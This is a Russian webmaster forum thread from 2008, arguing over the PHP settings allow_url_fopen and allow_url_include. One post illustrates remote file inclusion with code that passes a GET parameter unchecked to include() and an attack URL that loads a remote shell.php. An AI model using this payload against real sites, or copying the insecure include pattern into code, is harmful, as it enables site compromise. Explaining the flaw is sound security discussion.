- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
Как удалить плохие SEO-ссылки и очистить ссылочную массу сайта
Применяем отклонение ссылок
Сервис Rookee
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
allow_url_fopen не так и плох, поэтому включен по умолчанию.
А вот allow_url_include выключен.
Andreyka, ты давай не в репу пиши, а конкретно покажи, где тут уязвимость.
В PHP вообще не разбираешься, а ещё умничать пытаешься.
Васисуалий, неужели нужно рассказывать в чем уязвимость allow_url_include ???
allow_url_fopen не так и плох, поэтому включен по умолчанию.
А вот allow_url_include выключен.
Мне кажется по умолчанию, и то и то открыто при стандартной инсталиации, по крайней мере директадмин. Спорить в этом не буду, так как особо не интересовался. На своих серверах автоматом и молча стараемся закрывать инклюд, там где закрыто проблем нет и не было, там где открыто, постоянно вылезает то спам, то шелл то ещё что то...
Васисуалий, неужели нужно рассказывать в чем уязвимость allow_url_include ???
Не нужно рассказы рассказывать. Вот конкретно строчка кода.
<?php include("http://example.com/includes/example_include.php"); ?>
показывай где в ЭТОЙ строке кода уязвимость. Не разбираешься - нечего умничать.
Васисуалий добавил 21.11.2008 в 14:02
Открывать allow_url_fopen, можно в том случае, если сажать каждого пользователя в "jail" по всем правилам, но это сложно и теряется производительность. В "jail"e.
Открывать его можно в том случае, если у программиста прямые руки, и он не похож на ламера Andreyka , а реально умеет разбираться в коде. Тогда можно.
Тем, что example.com можно поменять на нужный ip и сделать включение иного кода, чем ожидалось
Про то, что dns можно отравить и заставить отдать не тот ip, что ожидалось, Васисуалий конечно же незнает
Andreyka, Васисуалий
Не те примеры Вы даёте.
Опасность есть в том, что если программист пишет сайт и у него например:
index.php?page=news.php
в коде index.php идёт строка:
$page=$_GET['page'];
include('$page');
то злоумышленник просто может сделать так:
index.php?page=http://site.ru/shell.php
тем самым получит доступ к вашему сайту.
LEOnidUKG, я только что про это писал, только более изящно ))
И наверное имелось в виду это:
<?php include("http://$_SERVER[HTTP_HOST]/includes/example_include.php"); ?>
непонимаю зачем писать полные пути, да ещё и через URL, почему не писать просто includes/example_include.php
Andreyka, И что легко можно ДНС подменить? Насколько я знаю к серверу запрос всегда идёт по ИП, а вебсервер (apache/nginx) смотрит заголовок Host: www.example.com, и уже направляет на нужный виртуальный хост. И если там не тот домен то и отдан будет не тот сайт)
Так что я не знаю каким образом можно подделать $_SERVER[HTTP_HOST], кроме случая ТС, где через скрипт объявляются все гет и пост переменные, а используются всё равно глобальные )
PS. allow_url_fopen allow_url_include
Лучше было бы сделать эти опции не в одну функцию а сделать просто отдельные функции, например:
fopen_url / include_url / file_get_contents_url
Dimanych, Действительно, не заметил и продублировал :)
LEOnidUKG, я только что про это писал, только более изящно ))
Andreyka, И что легко можно ДНС подменить? Насколько я знаю к серверу запрос всегда идёт по ИП, а вебсервер (apache/nginx) смотрит заголовок Host: www.example.com, и уже направляет на нужный виртуальный хост.
Инклайд делает не апач а php
Подменить не легко, но реально